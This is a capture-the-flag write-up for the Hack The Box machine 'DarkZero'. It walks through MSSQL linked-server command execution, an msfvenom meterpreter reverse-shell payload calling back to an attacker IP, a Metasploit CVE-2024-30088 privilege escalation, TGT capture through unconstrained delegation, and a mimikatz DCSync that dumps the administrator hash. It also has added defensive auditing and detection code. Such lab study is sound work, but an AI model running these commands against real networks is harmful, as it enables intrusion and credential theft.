DarkZero is a hard-difficulty machine from Hack The Box that deals initially with MSSQL linked servers, allowing us to pivot through a linked SQL server on a secondary domain controller to achieve remote code execution. We’ll then escalate privileges using CVE-2024-30088 to get SYSTEM on the second DC, abuse unconstrained delegation to capture a TGT from DC01, and finally perform a DCSync attack against the parent domain to obtain the domain administrator’s NTLM hash.
DarkZero
Reconnaissance
As is common in real life pentests, we start with credentials for the following account: john.w:RFulUtONCOL!
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-10-08 10:57:24Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after:  2026-07-29T11:40:00
|_ssl-date: TLS randomness does not represent time
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after:  2026-07-29T11:40:00
|_ssl-date: TLS randomness does not represent time
1433/tcp open  ms-sql-s      Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-ntlm-info:
|   10.129.199.110:1433:
|     Target_Name: darkzero
|     NetBIOS_Domain_Name: darkzero
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: darkzero.htb
|     DNS_Computer_Name: DC01.darkzero.htb
|     DNS_Tree_Name: darkzero.htb
|_    Product_Version: 10.0.26100
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-10-08T09:26:12
|_Not valid after:  2055-10-08T09:26:12
|_ssl-date: 2025-10-08T10:59:08+00:00; +7h00m03s from scanner time.
| ms-sql-info:
|   10.129.199.110:1433:
|     Version:
|       name: Microsoft SQL Server 2022 RTM
|       number: 16.00.1000.00
|       Product: Microsoft SQL Server 2022
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
2179/tcp open  vmrdp?
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after:  2026-07-29T11:40:00
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after:  2026-07-29T11:40:00
|_ssl-date: TLS randomness does not represent time
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (88%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (88%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
We can see this is a Windows domain controller DC01.darkzero.htb with a lot of the usual AD ports open. What stands out here is MSSQL on port 1433 running Microsoft SQL Server 2022. Since we already have credentials, let’s start there.
MSSQL - Linked Servers
We can connect to the MSSQL instance using impacket-mssqlclient with Windows authentication:
┌──(kali㉿kali)-[~]
└─$ impacket-mssqlclient 'darkzero.htb/john.w:RFulUtONCOL!@10.129.199.110' -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (darkzero\john.w  guest@master)>
We land as a guest on the master database. One thing I always do in MSSQL engagements is check for linked servers. Enumerating links reveals a second SQL server on DC02.darkzero.ext.
We can see that our john.w account is mapped to dc01_sql_svc on the linked server and we land as dbo on the master database of DC02.darkzero.ext. Even better, xp_cmdshell is enabled and we can execute commands as darkzero-ext\svc_sql. Let’s get a proper reverse shell.
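The login mapping is what makes this hop dangerous: a guest on DC01 arrives on DC02 as a fixed, privileged remote login, and xp_cmdshell on the far side turns that into code execution. The check below is an added example (not impacket's enum_links and not output from the box): it audits the rows a DBA would pull from sys.servers and sys.linked_logins and ranks the mappings. The AUDIT_QUERY is standard catalog-view T-SQL; the LinkedLogin rows and the REPORTS01, LEGACY and ARCHIVE server names are constructed, and the DC02 row assumes a catch-all mapping to dc01_sql_svc, which the writeup does not state.

```python
"""Audit SQL Server linked-server login mappings for privilege hops.

Added example, not impacket or the writeup's own code. Rows are constructed
to mirror the DC01 -> DC02 link: a low-privileged caller mapped to a fixed
remote login that is dbo on the far side."""

from dataclasses import dataclass
from typing import Optional

# T-SQL that yields the fields used below (run on the *source* instance).
AUDIT_QUERY = """
SELECT s.name, s.is_rpc_out_enabled, ll.local_principal_id,
       ll.uses_self_credential, ll.remote_name
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1;
"""


@dataclass
class LinkedLogin:
    server: str                 # sys.servers.name
    rpc_out: bool               # is_rpc_out_enabled: needed for EXEC ... AT server
    local_principal_id: int     # 0 = the default mapping applied to every local login
    uses_self_credential: bool  # 1 = the caller's own security context is forwarded
    remote_name: Optional[str]  # fixed remote login used for the hop, if any


def audit_linked_logins(rows):
    """Return one finding per mapping that hands callers a different identity."""
    findings = []
    for r in rows:
        if r.uses_self_credential or r.remote_name is None:
            # Forwarding the caller's own identity, or refusing unmapped logins
            # (no remote_name and no self credential), grants nobody extra rights.
            continue
        catch_all = r.local_principal_id == 0
        findings.append({
            "server": r.server,
            "remote_login": r.remote_name,
            "scope": "all logins" if catch_all else f"principal {r.local_principal_id}",
            "rpc_out": r.rpc_out,
            # Every local login (guest included) becomes remote_name on the far side.
            "severity": "high" if catch_all else "medium",
        })
    return findings


# Constructed rows (not real catalog output). The DC02 row *assumes* a
# catch-all mapping; the other servers are hypothetical.
SAMPLE_ROWS = [
    LinkedLogin("DC02.darkzero.ext", True, 0, False, "dc01_sql_svc"),
    LinkedLogin("REPORTS01", False, 0, True, None),    # impersonate: fine
    LinkedLogin("LEGACY", False, 7, False, "svc_report"),
    LinkedLogin("ARCHIVE", True, 0, False, None),      # unmapped logins refused
]

if __name__ == "__main__":
    for f in audit_linked_logins(SAMPLE_ROWS):
        print(f"[{f['severity']}] {f['server']}: {f['scope']} -> {f['remote_login']}")
```

The remediation this points at is the mapping itself: use "Be made using the login's current security context" (uses_self_credential) or explicit per-login mappings, give the remote login the least rights it needs rather than dbo, and leave xp_cmdshell disabled on the target instance.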
Foothold - Reverse Shell via MSSQL Link
We execute a PowerShell reverse shell through the linked server:
User Name            SID
==================== ============================================
darkzero-ext\svc_sql S-1-5-21-1969715525-31638512-2552845157-1103

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                                            Attributes
========================================== ================ ============================================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574                                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                       Well-known group S-1-5-6                                                        Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                                       Mandatory group, Enabled by default, Enabled group
NT SERVICE\MSSQLSERVER                     Well-known group S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003 Enabled by default, Enabled group, Group owner
LOCAL                                      Well-known group S-1-2-0                                                        Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1                                                       Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeCreateGlobalPrivilege       Create global objects          Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
We don’t have SeImpersonatePrivilege here, which rules out the usual potato-style attacks. Let’s get a meterpreter session for more options.
Privilege Escalation - CVE-2024-30088
We generate a meterpreter payload and upload it to the target:
┌──(kali㉿kali)-[~]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.6 LPORT=4444 -f exe -o kujen.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: kujen.exe
meterpreter > run post/multi/recon/local_exploit_suggester

[*] 172.16.20.2 - Collecting local exploits for x64/windows...
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/logging-2.4.0/lib/logging.rb:10: warning: /usr/lib/x86_64-linux-gnu/ruby/3.3.0/syslog.so was loaded from the standard library, but will no longer be part of the default gems starting from Ruby 3.4.0. You can add syslog to your Gemfile or gemspec to silence this warning. Also please contact the author of logging-2.4.0 to request adding syslog into its gemspec.
[*] 172.16.20.2 - 205 exploit checks are being tried...
[+] 172.16.20.2 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 172.16.20.2 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 172.16.20.2 - exploit/windows/local/cve_2022_21882_win32k: The service is running, but could not be validated. May be vulnerable, but exploit not tested on Windows Server 2022
[+] 172.16.20.2 - exploit/windows/local/cve_2022_21999_spoolfool_privesc: The target appears to be vulnerable.
[+] 172.16.20.2 - exploit/windows/local/cve_2023_28252_clfs_driver: The target appears to be vulnerable. The target is running windows version: 10.0.20348.0 which has a vulnerable version of clfs.sys installed by default
[+] 172.16.20.2 - exploit/windows/local/cve_2024_30085_cloud_files: The target appears to be vulnerable.
[+] 172.16.20.2 - exploit/windows/local/cve_2024_30088_authz_basep: The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
[+] 172.16.20.2 - exploit/windows/local/cve_2024_35250_ks_driver: The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2022
[+] 172.16.20.2 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[*] Running check method for exploit 49 / 49
[*] 172.16.20.2 - Valid modules for session 1:
============================

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/bypassuac_dotnet_profiler                Yes                      The target appears to be vulnerable.
 2   exploit/windows/local/bypassuac_sdclt                          Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/cve_2022_21882_win32k                    Yes                      The service is running, but could not be validated. May be vulnerable, but exploit not tested on Windows Server 2022
 4   exploit/windows/local/cve_2022_21999_spoolfool_privesc         Yes                      The target appears to be vulnerable.
 5   exploit/windows/local/cve_2023_28252_clfs_driver               Yes                      The target appears to be vulnerable. The target is running windows version: 10.0.20348.0 which has a vulnerable version of clfs.sys installed by default
 6   exploit/windows/local/cve_2024_30085_cloud_files               Yes                      The target appears to be vulnerable.
 7   exploit/windows/local/cve_2024_30088_authz_basep               Yes                      The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
 8   exploit/windows/local/cve_2024_35250_ks_driver                 Yes                      The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2022
 9   exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.
We have plenty of options here. We’ll go with CVE-2024-30088, a Windows kernel elevation of privilege vulnerability. We background our meterpreter session and configure the exploit:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST     10.10.16.6       yes       The listen address (an interface may be specified)
LPORT     4455             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows x64

View the full module info with the info, or info -d command.

msf6 exploit(windows/local/cve_2024_30088_authz_basep) > set lport 8284
lport => 8284
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > exploit
[*] Started reverse TCP handler on 10.10.16.6:8284
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
[*] Reflectively injecting the DLL into 3092...
[+] The exploit was successful, reading SYSTEM token from memory...
[+] Successfully stole winlogon handle: 880
[+] Successfully retrieved winlogon pid: 600
[*] Sending stage (203846 bytes) to 10.129.199.110
[*] Meterpreter session 4 opened (10.10.16.6:8284 -> 10.129.199.110:59043) at 2025-10-08 01:08:20 -0400

meterpreter > shell
Process 828 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.2113]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd ../../users/administrators
cd ../../users/administrators
The system cannot find the path specified.

C:\Windows\system32>cd ../../users/administrator
cd ../../users/administrator

C:\Users\Administrator>cd desktop
cd desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E415-87AD

C:\Users\Administrator\Desktop>type user.txt
type user.txt
92a46b6f2d91d59b479b8bb659e40979

C:\Users\Administrator\Desktop>
We are now SYSTEM on DC02 and we can grab the user flag.
Lateral Movement - Unconstrained Delegation
Now that we have SYSTEM on DC02, we need to move laterally to DC01, the domain controller for darkzero.htb. We upload PowerView and check for unconstrained delegation.
DC02 has the TRUSTED_FOR_DELEGATION flag set, which means it’s configured for unconstrained delegation: any forwardable TGT presented to it by an authenticating client is cached in its LSASS. We run Rubeus in monitor mode and wait for DC01’s machine account TGT to come in:
[*] 10/8/2025 1:31:02 PM UTC - Found new TGT:

  User                  :  DC01$@DARKZERO.HTB
  StartTime             :  10/8/2025 6:31:00 AM
  EndTime               :  10/8/2025 4:31:00 PM
  RenewTill             :  10/15/2025 6:31:00 AM
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  Base64EncodedTicket   :

PS C:\users\administrator\desktop> ./Rubeus.exe ptt /ticket:[base64 ticket omitted]
./Rubeus.exe ptt /ticket:[base64 ticket omitted]
We now have DC01’s machine account TGT imported into our session.
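PowerView’s unconstrained-delegation check is a bitmask test on userAccountControl, and the same attribute decides which accounts are exposed when a host like DC02 is compromised. The Python below is an added example for the defender side, not PowerView and not data from the box: it decodes the UAC bits, lists every principal trusted for unconstrained delegation (domain controllers are the expected case, anything else deserves a ticket), and reports whether a given account’s TGT could be harvested on such a host. The account records are constructed, and the protectedUsers field is a hypothetical stand-in for Protected Users group membership.

```python
"""Decode userAccountControl and report unconstrained-delegation exposure.

Added example (not PowerView, not LDAP output from the box). Account
records below are constructed."""

from typing import Union

# userAccountControl bits (MS-ADTS). Only the ones relevant here are listed.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",              # domain controller
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",           # unconstrained delegation
    0x100000: "NOT_DELEGATED",                   # "sensitive and cannot be delegated"
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION", # constrained + protocol transition
}
TRUSTED_FOR_DELEGATION = 0x80000
SERVER_TRUST_ACCOUNT = 0x2000
NOT_DELEGATED = 0x100000


def decode_uac(value: Union[int, str]) -> list:
    """Accept an int or the zero-padded hex string tools print (e.g. '00010200')."""
    if isinstance(value, str):
        value = int(value, 16)
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def unconstrained_delegation_report(accounts):
    """Return (sAMAccountName, kind) for every principal trusted for
    unconstrained delegation. DCs carry the bit by default; anything else
    is a host where other accounts' TGTs can be collected."""
    report = []
    for a in accounts:
        uac = a["userAccountControl"]
        if not uac & TRUSTED_FOR_DELEGATION:
            continue
        kind = "domain controller" if uac & SERVER_TRUST_ACCOUNT else "non-DC (review)"
        report.append((a["sAMAccountName"], kind))
    return report


def delegation_exposed(account) -> bool:
    """True if this account's TGT would be forwarded to (and cached on) an
    unconstrained host: it is neither NOT_DELEGATED nor in Protected Users.
    'protectedUsers' is a hypothetical field standing in for group membership."""
    uac = account["userAccountControl"]
    return not (uac & NOT_DELEGATED) and not account.get("protectedUsers", False)


# Constructed records (not real directory data).
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "DC01$", "userAccountControl": 0x82000},
    {"sAMAccountName": "DC02$", "userAccountControl": 0x82000},
    {"sAMAccountName": "WEB01$", "userAccountControl": 0x81000},
    {"sAMAccountName": "Administrator", "userAccountControl": 0x10200},
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x110200, "protectedUsers": True},
]

if __name__ == "__main__":
    for name, kind in unconstrained_delegation_report(SAMPLE_ACCOUNTS):
        print(f"{name}: unconstrained delegation ({kind})")
    for a in SAMPLE_ACCOUNTS[3:]:
        print(f"{a['sAMAccountName']}: {decode_uac(a['userAccountControl'])}, "
              f"exposed={delegation_exposed(a)}")
```

The report half answers “where can tickets be harvested”; the exposure half answers “whose tickets”. Marking privileged and machine accounts NOT_DELEGATED (or putting users in Protected Users) is what stops the TGT from being forwarded in the first place.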
DCSync - Domain Administrator
With DC01’s TGT, we can now perform a DCSync attack against darkzero.htb to extract the domain administrator’s NTLM hash. We upload BetterSafetyKatz and run mimikatz’s lsadump::dcsync:
PS C:\users\administrator\desktop> iwr 10.10.16.6/BetterSafetyKatz.exe -outfile BetterSafetyKatz.exe
iwr 10.10.16.6/BetterSafetyKatz.exe -outfile BetterSafetyKatz.exe
PS C:\users\administrator\desktop> ./BetterSafetyKatz.exe "lsadump::dcsync /user:darkzero\administrator" "exit"
./BetterSafetyKatz.exe "lsadump::dcsync /user:darkzero\administrator" "exit"
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and @Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!

  .#####.   mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::dcsync /user:darkzero\administrator
[DC] 'darkzero.ext' will be the domain
[DC] 'DC02.darkzero.ext' will be the DC server
[DC] 'darkzero\administrator' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
The first attempt targets the wrong domain, darkzero.ext, because mimikatz defaults to the domain of the host we’re running on (DC02). We add the /domain:darkzero.htb flag to target the parent domain:
PS C:\users\administrator\desktop> ./BetterSafetyKatz.exe "lsadump::dcsync /user:darkzero\administrator /domain:darkzero.htb" "exit"
./BetterSafetyKatz.exe "lsadump::dcsync /user:darkzero\administrator /domain:darkzero.htb" "exit"
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and @Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!
mimikatz(commandline) # lsadump::dcsync /user:darkzero\administrator /domain:darkzero.htb
[DC] 'darkzero.htb' will be the domain
[DC] 'DC01.darkzero.htb' will be the DC server
[DC] 'darkzero\administrator' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   :
Password last change : 9/10/2025 9:42:44 AM
Object Security ID   : S-1-5-21-1152179935-589108180-1989892463-500
Object Relative ID   : 500
We successfully extracted the domain administrator’s NTLM hash: 5917507bdf2ef2c2b0a869a1cba40726. From here we can pass the hash to authenticate to DC01 and claim the root flag.
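On the detection side, a DCSync is a directory-replication request made by something that is not a replication partner, and it leaves Security event 4662 on the DC with the DS-Replication-Get-Changes control-access GUIDs. A naive rule that only checks “subject is not a machine account” misses exactly this chapter, because the request was made with DC01$’s own ticket; the subject is a genuine DC. The Python below is an added example, not a product rule and not events from the box: it correlates each 4662 with the 4624 that created the subject’s logon session, so a DC account replicating from any address other than its own is flagged alongside non-DC principals. The event lines, the DC inventory (which borrows the two addresses seen in the writeup) and the logon IDs are constructed.

```python
"""Detect DCSync-style replication requests in Security log events.

Added example, not from the writeup. Correlates 4662 (replication control
access on the domain object) with 4624 (logon that produced the subject's
session) so the request is judged by who asked *and* from where. Event
lines, DC inventory and logon IDs are constructed for the demo."""

import re

# Control-access GUIDs a DCSync requires (DS-Replication-Get-Changes family).
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}

# Constructed inventory: each DC machine account and the address it should
# authenticate from. A DC's ticket arriving from any other host is what a
# replayed, captured TGT looks like.
DC_ACCOUNTS = {"DC01$": "10.129.199.110", "DC02$": "172.16.20.2"}

_KV = re.compile(r"(\w+)=(\S+)")
_GUID = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}")


def parse_event(line: str) -> dict:
    """Parse one constructed 'EventID key=value ...' line into a dict."""
    event_id, _, rest = line.strip().partition(" ")
    fields = dict(_KV.findall(rest))
    fields["EventID"] = int(event_id)
    return fields


def replication_guids(properties: str) -> set:
    """Replication GUIDs present in a 4662 Properties field."""
    return set(_GUID.findall(properties.lower())) & REPLICATION_GUIDS


def detect_dcsync(lines, dc_accounts=DC_ACCOUNTS):
    """Flag 4662 replication requests from non-DC principals, and from DC
    accounts whose logon session did not originate at that DC's own address."""
    logons = {}  # LogonId -> source IP, learned from 4624
    findings = []
    for ev in map(parse_event, lines):
        if ev["EventID"] == 4624:
            logons[ev["LogonId"].lower()] = ev.get("IpAddress", "-")
            continue
        if ev["EventID"] != 4662:
            continue
        guids = replication_guids(ev.get("Properties", ""))
        if not guids:
            continue  # ordinary directory access, not replication
        subject = ev["SubjectUserName"]
        source = logons.get(ev.get("SubjectLogonId", "").lower(), "unknown")
        if subject not in dc_accounts:
            reason = "replication rights used by a non-DC principal"
        elif source != dc_accounts[subject]:
            reason = f"DC account used from {source}, expected {dc_accounts[subject]}"
        else:
            continue  # a DC replicating from its own address: normal
        findings.append({"subject": subject, "source": source,
                         "reason": reason, "guids": sorted(guids)})
    return findings


# Constructed Security-log lines (not real events). The last one touches a
# non-replication property and must not fire.
SAMPLE_EVENTS = [
    "4624 TargetUserName=DC02$ LogonId=0x8802 LogonType=3 IpAddress=172.16.20.2",
    "4662 SubjectUserName=DC02$ SubjectLogonId=0x8802 AccessMask=0x100 Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}",
    "4624 TargetUserName=DC01$ LogonId=0x5f21 LogonType=3 IpAddress=172.16.20.2",
    "4662 SubjectUserName=DC01$ SubjectLogonId=0x5f21 AccessMask=0x100 Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "4624 TargetUserName=john.w LogonId=0x7a10 LogonType=3 IpAddress=10.10.16.6",
    "4662 SubjectUserName=john.w SubjectLogonId=0x7a10 AccessMask=0x100 Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "4662 SubjectUserName=svc_backup SubjectLogonId=0x9 AccessMask=0x100 Properties={bf967aba-0de6-11d0-a285-00aa003049e2}",
]

if __name__ == "__main__":
    for f in detect_dcsync(SAMPLE_EVENTS):
        print(f"[!] {f['subject']} from {f['source']}: {f['reason']}")
```

The 4662 event only fires if the SACL on the domain object audits control access, so the rule is only as good as the audit policy behind it; the inventory of DC addresses is the part that catches a replayed DC ticket, which is why it is worth maintaining.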
That was it for DarkZero, hope you learned something new! -0xkujen